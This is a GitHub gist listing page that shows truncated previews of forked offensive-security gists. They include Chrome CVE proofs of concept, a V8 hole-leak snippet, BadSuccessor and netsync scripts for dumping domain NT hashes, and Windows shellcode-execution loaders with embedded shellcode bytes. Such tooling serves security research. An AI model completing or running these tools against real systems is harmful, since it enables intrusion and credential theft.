ASkyeye
/ CVE-2025-6558.html
Created
September 16, 2025 19:52
— forked from d4rkc0nd0r/CVE-2025-6558.html
CVE-2025-6558 PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>CVE-2025-6558 PoC</title> | |
| </head> | |
| <body> | |
| <canvas id="canvas" width="480" height="640"></canvas> | |
| <script> | |
| function tf_bug() { |
ASkyeye
/ badsuccessordumper_postpatch.py
Created
September 1, 2025 06:23
— forked from ThePirateWhoSmellsOfSunflowers/badsuccessordumper_postpatch.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import datetime | |
| import logging | |
| import os | |
| import random | |
| import struct | |
| import sys | |
| from binascii import hexlify, unhexlify | |
| from six import ensure_binary |
ASkyeye
/ JasonToddIsTheBestRobin.c
Created
August 23, 2025 12:03
— forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
ASkyeye
/ LowNtReadFile.c
Created
August 13, 2025 00:34
— forked from whokilleddb/LowNtReadFile.c
Read contents of a file using LowNtReadFile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #pragma comment(lib, "ntdll.lib") | |
| #define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt" | |
| EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions); |
ASkyeye
/ enclave.c
Created
August 3, 2025 23:49
— forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| // Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12 | |
| // Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll | |
| EXTERN_C NTSYSAPI | |
| NTSTATUS | |
| NTAPI LdrCallEnclave( | |
| _In_ PENCLAVE_ROUTINE Routine, |
ASkyeye
/ badsuccessordumper.py
Created
August 1, 2025 13:19
— forked from ThePirateWhoSmellsOfSunflowers/badsuccessordumper.py
This script retrieves NT hashes of all domain users and computers using a dMSA
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import datetime | |
| import logging | |
| import os | |
| import random | |
| import struct | |
| import sys | |
| from binascii import hexlify, unhexlify | |
| from six import ensure_binary |
ASkyeye
/ CVE-2025-6554 POC.js
Created
July 2, 2025 23:49
— forked from mistymntncop/CVE-2025-6554 POC.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function leak_hole() { | |
| let x; | |
| delete x?.[y]?.a; | |
| return y; | |
| let y; | |
| } | |
| function pwn() { | |
| let hole = leak_hole(); | |
| %DebugPrint(hole); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Return, but across multiple frames. | |
| // | |
| // This function unwinds the given number of frames, then sets the return value provided, emulating as if this number | |
| // of functions returned, with the last one returning the value provided in RetVal. Can be used to hook a callee when | |
| // you don't have a convenient way to hook it directly and actually just want to stub it out with a return value. | |
| // | |
| // @param FramesToSkip The number of frames to skip, starting from the current frame. | |
| // @param RetVal The value to return from the last frame. | |
| // @param Context Context to start from, in case you want to SuperReturn from somewhere deeper. | |
| DECLSPEC_NOINLINE void SuperReturn( |
ASkyeye
/ netdumper.py
Created
May 2, 2025 01:14
— forked from ThePirateWhoSmellsOfSunflowers/netdumper.py
This script perform a netsync attack. No SMB involved
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr | |
| from impacket.uuid import bin_to_uuidtup | |
| from impacket.crypto import SamDecryptNTLMHash | |
| from binascii import unhexlify, hexlify | |
| from random import randbytes | |
| import sys | |
| import argparse | |
| # This script perform a netsync attack. No SMB involved | |
| # My first idea was to only use netlogon SSP, however SAMR seems not compatible |
ASkyeye
/ crt.c
Created
April 29, 2025 12:27
— forked from odzhan/crt.c
Writing Tiny Executables in C
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| Compile with your C console project. | |
| */ | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #define __UNKNOWN_APP 0 | |
| #define __CONSOLE_APP 1 | |
| #define __GUI_APP 2 |
NewerOlder